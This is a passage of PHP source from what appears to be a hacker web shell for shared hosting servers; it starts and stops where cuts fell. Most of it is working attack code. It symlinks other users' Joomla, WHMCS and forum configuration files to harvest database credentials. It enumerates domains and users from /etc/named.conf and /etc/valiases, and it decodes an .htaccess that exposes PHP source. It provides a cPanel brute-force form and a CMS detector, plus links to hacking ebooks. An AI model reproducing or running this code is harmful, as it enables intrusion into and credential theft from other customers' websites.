Joomla1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t}\r\n\r\n\t\t\t\t$d0mains = @file("/etc/named.conf");\r\n\t\t\r\n\t\t\t\tif($d0mains)\r\n\t\t\t\t{\r\n\t\t\t\t\tmkdir($fn);\r\n\t\t\t\t\tchdir($fn);\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\tforeach($d0mains as $d0main)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(eregi("zone",$d0main))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tpreg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n\t\t\t\t\t\t\tflush();\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif(strlen(trim($domains[1][0])) > 2)\r\n\t\t\t\t\t\t\t{ \r\n\t\t\t\t\t\t\t\t$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\tsyml($user[\'name\'],$domains[1][0]);\t\t\t\t\t\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo "<center><font color=lime size=3>[ Done ]</font></center>";\r\n\t\t\t\t\techo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; \r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tmkdir($fn);\r\n\t\t\t\t\tchdir($fn);\r\n\t\t\t\t\t$temp = "";\r\n\t\t\t\t\t$val1 = 0;\r\n\t\t\t\t\t$val2 = 1000;\r\n\t\t\t\t\tfor(;$val1 <= $val2;$val1++) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$uid = @posix_getpwuid($val1);\r\n\t\t\t\t\t\tif ($uid)\r\n\t\t\t\t\t\t\t$temp .= join(\':\',$uid)."\\n";\r\n\t\t\t\t\t }\r\n\t\t\t\t\t echo \'<br/>\';\r\n\t\t\t\t\t $temp = trim($temp);\r\n\t\t\t\t\t \r\n\t\t\t\t\t $file5 = fopen("test.txt","w");\r\n\t\t\t\t\t fputs($file5,$temp);\r\n\t\t\t\t\t fclose($file5);\r\n\r\n$htaccess =\r\n\'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh\r\naW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp\r\nbiAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=\r\n\';\r\n$file = fopen(".htaccess","w+");\r\n$write = fwrite ($file ,base64_decode($htaccess));\r\n\t\t\t\t\t \r\n\t\t\t\t\t $file = fopen("test.txt", "r") or exit("Unable to open file!");\r\n\t\t\t\t\t while(!feof($file))\r\n\t\t\t\t\t {\r\n\t\t\t\t\t\t$s = fgets($file);\r\n\t\t\t\t\t\t$matches = array();\r\n\t\t\t\t\t\t$t = preg_match(\'/\\/(.*?)\\:\\//s\', $s, $matches);\r\n\t\t\t\t\t\t$matches = str_replace("home/","",$matches[1]);\r\n\t\t\t\t\t\tif(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\tsyml($matches,$matches);\r\n\t\t\t\t\t }\r\n\t\t\t\t\tfclose($file);\r\n\t\t\t\t\techo "</table>";\r\n\t\t\t\t\tunlink("test.txt");\r\n\t\t\t\t\techo "<center><font color=lime size=3>[ Done ]</font></center>";\r\n\t\t\t\t\techo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; \r\n\t\t\t\t}\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\n?>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="page" type="hidden" value="find"><table>      \t\t\t\t\r\n    </strong><br><br><center><font size="5" style="italic" color="#00ff00">=[ Cpanel BruteForce ]=</font></center><br><br>\r\n    <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\t<tr>\r\n\t<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<center><b><font size="5" style="italic" color="#00ff00">Cpanel BruteForce</font></b></center></td></tr>\r\n    <tr>\r\n    <td>\r\n    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>User :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class =\'inputz\' rows="10" name="usernames"><?php system(\'ls /var/mail\');?></textarea></strong></td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>Pass :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class =\'inputz\' rows="10" name="passwords"></textarea></strong></td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>Type :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n    <span class="style2"><strong>Simple : </strong> </span>\r\n\t<strong>\r\n\t<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>\r\n    <font class="style2"><strong>/etc/passwd : </strong> </font>\r\n\t<strong>\r\n\t<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>\r\n\t</strong>\r\n\t</span>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class =\'inputzbut\' type="submit" value="start">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form> \r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>\r\n    \t\t\t\t</tr>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="mendapatkan" type="hidden" value="passwd">        \t\t\t\t\r\n    </strong>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>\r\n    <td valign="top" bgcolor="#151515"><strong><input class =\'inputz\' size="35" name="foldername" type="text"></strong></td>\r\n\t</strong>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class =\'inputzbut\' type="submit" value="GO">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form>   \r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>\r\n    \t\t\t\t</tr>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="pass" type="hidden" value="password">        \t\t\t\t\r\n    </strong>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>\r\n    <td valign="top" bgcolor="#151515"><strong><input class =\'inputz\' size="35" name="url" type="text"></strong></td>\r\n\t</strong>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class =\'inputzbut\' type="submit" value="GO">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form>\r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info \r\n\tSecurity</strong></td>\r\n    \t\t\t\t</tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n\t<strong>\r\n<?php\r\n$safe_mode = ini_get(\'safe_mode\');\r\nif($safe_mode==\'1\')\r\n{\r\necho \'ON\';\r\n}else{\r\necho \'OFF\';\r\n}\r\n\r\n?>\t\r\n\t</strong>\t\r\n\t</td>\r\n    \t\t\t\t</tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n\t<strong>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="matikan" type="hidden" value="sekatan">        \t\t\t\t\r\n    </strong>\r\n\r\n<?php\r\nif(\'\'==($func=@ini_get(\'disable_functions\')))\r\n{\r\necho "<font color=#00ff00>No Security for Function</font></b>";\r\n}else{\r\necho \'<script>alert("Please see below and press >Please Click Here First!<");</script>\';\r\necho "<font color=red>$func</font></b>";\r\necho \'<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>\';\r\necho \'<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">\r\n    </strong>\r\n    </td></tr>\';\r\n}\r\n?></strong></td></tr></table></table></table>\r\n<?\r\n}\r\n///////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'tutor\'))\r\n    {\r\n    ?>\r\n\t<form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">\r\n\t<center><br><br><b>+--=[ Tutorial & Ebook hacking ]=--+</b><br>\r\n\t\t<form method="post" action="">\r\n<table class="tabnet" border="1" >\r\n<tr>\r\n\t\t<td align="center">English</td><td align="center">Indonesian</td>\r\n\t</tr>\r\n\t<tr>\r\n\t\t<td><form method="post" action="">&nbsp;\r\n\tE-book Hacking &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut" name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="tutorial24" > Hacking Exposed-5 </option>\r\n\t<option value="tutorial25"> Internet Denial Of Service </option>\r\n\t<option value="tutorial26">Computer Viruses For Dummies</option>\r\n\t<option value="tutorial27">Hack Attacks Testing</option>\r\n\t<option value="tutorial28">Secrets Of A Super Hacker</option>\r\n\t<option value="tutorial29">Stealing The Network</option>\r\n\t<option value="tutorial30">Hacker\'s HandBook</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n\t</td></form>\r\n<td><form method="post" action="">&nbsp;\r\nTutorial by X\'1N73CT &nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut"  name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t\t<option value="tutorial2">Search Engine Hacking</option>\r\n\t\t<option value="tutorial3">SQL Injection dengan hackbar</option>\r\n\t\t<option value="tutorial1" >Bypass Union</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n</form></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<form method="post" action="">&nbsp;\r\nE-Book from Syn|gress &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut"  name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="cryptography_for_defeloper">Cryptography for Developer</option>\r\n\t<option value="tutorial31">Mobile Malware Attack and Defense</option>\r\n\t<option value="forensic">CD and DVD Forensic</option>\r\n\t<option value="ddd">Open Sourch Security Tools</option>\r\n\t<option value="metasploit">Metaslpoit Toolkit</option>\r\n\t<option value="stealing_network">Stealing the Network</option>\r\n\t<option value="security_polices">Creating Security Polices</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n</form></td>\r\n<td>\r\n<form method="post" action="">&nbsp;\r\nX-CODE MAGAZINE &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut" name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="tutorial4">X-CODE MAGAZINE 1</option>\r\n\t<option value="tutorial5">X-CODE MAGAZINE 2</option>\r\n\t<option value="tutorial6">X-CODE MAGAZINE 3</option>\r\n\t<option value="tutorial7">X-CODE MAGAZINE 4</option>\r\n\t<option value="tutorial8">X-CODE MAGAZINE 5</option>\r\n\t<option value="tutorial9">X-CODE MAGAZINE 6</option>\r\n\t<option value="tutorial10">X-CODE MAGAZINE 7</option>\r\n\t<option value="tutorial11">X-CODE MAGAZINE 8</option>\r\n\t<option value="tutorial12">X-CODE MAGAZINE 9</option>\r\n\t<option value="tutorial13">X-CODE MAGAZINE 10</option>\r\n\t<option value="tutorial14">X-CODE MAGAZINE 11</option>\r\n\t<option value="tutorial15">X-CODE MAGAZINE 12</option>\r\n\t<option value="tutorial16">X-CODE MAGAZINE 13</option>\r\n\t<option value="tutorial17">X-CODE MAGAZINE 14</option>\r\n\t<option value="tutorial18">X-CODE MAGAZINE 15</option>\r\n\t<option value="tutorial19">X-CODE MAGAZINE 16</option>\r\n\t<option value="tutorial20">X-CODE MAGAZINE 17</option>\r\n\t<option value="tutorial21">X-CODE MAGAZINE 18</option>\r\n\t<option value="tutorial22">X-CODE MAGAZINE 19</option>\r\n\t<option value="tutorial23">X-CODE MAGAZINE 20</option>\r\n\t<option value="tutorial024">X-CODE MAGAZINE 21</option>\r\n\t</select>\r\n\t<input type="submit" name="submit" class="inputzbut" value="Download" ></a>\r\n</form></td></tr></table><br><br>\r\n<?php\r\n$submit = $_POST [\'submit\'];\r\nif(isset($submit)) {\r\n\t$pilih = $_POST[\'pilih\'];\r\n\t\tif ( $pilih == \'tutorial1\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial2\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial3\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial4\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_1.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial5\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_2.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial6\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_3.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial7\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_4.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial8\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_5.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial9\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_6.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial10\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_7.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial11\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_8.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial12\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode9.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial13\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode10.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial14\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode11.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial15\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode12.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial16\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode13.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial17\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode14.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial18\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/Xcode15.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial19\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_16.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial20\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_17.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial21\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_18.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial22\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_19.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial23\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_20.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial024\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_21.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\t\r\n\t\telseif ( $pilih == \'tutorial24\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/hacking_exposed_5.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial25\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/internet_denial_of_service.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial26\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/computer_viruses_for_dummies.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial27\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/hack_attacks_testing.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial28\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/secrets_of_super_hacker.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial29\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial30\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/webapp_hackers_handbook.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'ddd\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial31\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'cryptography_for_defeloper\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'forensic\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'metasploit\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}elseif ( $pilih == \'stealing_network\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}elseif ( $pilih == \'security_polices\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n}\r\n\r\n}\r\n////////////////////////////////////////////////////////////////////\r\n\r\n//////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cms_detect\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">\r\n\t<br><br><br><br><center><b><font size=4>+--=[ CMS Detector ]=--+</font></b></center><br><br>\r\n    <?php\r\nif(!file_exists(\'pee.tmp\')){\r\n@fopen(\'pee.tmp\', \'w\');\r\n\r\necho\'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">\';\r\necho\'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>\';\r\n\r\n$p = 0;\r\n\r\nif(is_readable("/var/named")){\r\n$list = scandir("/var/named");\r\n$current_dir = posix_getcwd();\r\n$dir = explode("/",$current_dir);\r\nforeach($list as $domain){\r\nif(strpos($domain,".db"))\r\n{\r\n\t$domain = str_replace(\'.db\',\'\',$domain);\r\n\t$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));\r\n\t\r\nerror_reporting(0);\r\n\r\n$link = $pageURL.\'pee/\'.$owner[\'name\'];\r\n\r\ncms_add($link,$domain,$owner[\'name\'],"WordPress");\r\ncms_add($link,$domain,$owner[\'name\'],"Joomla");\r\ncms_add($link,$domain,$owner[\'name\'],"vBulletin");\r\ncms_add($link,$domain,$owner[\'name\'],"WHMCS");\r\ncms_add($link,$domain,$owner[\'name\'],"PhpBB");\r\ncms_add($link,$domain,$owner[\'name\'],"MyBB");\r\ncms_add($link,$domain,$owner[\'name\'],"IPB");\r\ncms_add($link,$domain,$owner[\'name\'],"SMF");\r\ncms_add($link,$domain,$owner[\'name\'],"Drupal");\r\ncms_add($link,$domain,$owner[\'name\'],"e107");\r\ncms_add($link,$domain,$owner[\'name\'],"Seditio");\r\ncms_add($link,$domain,$owner[\'name\'],"osCommerce");\r\n\r\n}\r\n}\r\n}\r\n}else{\r\necho\'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">\';\r\necho\'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>\';\r\n$content = file_get_contents($pageURL.\'pee.tmp\');\r\necho $content;\r\n}\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jss\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">\r\n    <?php\r\n\techo 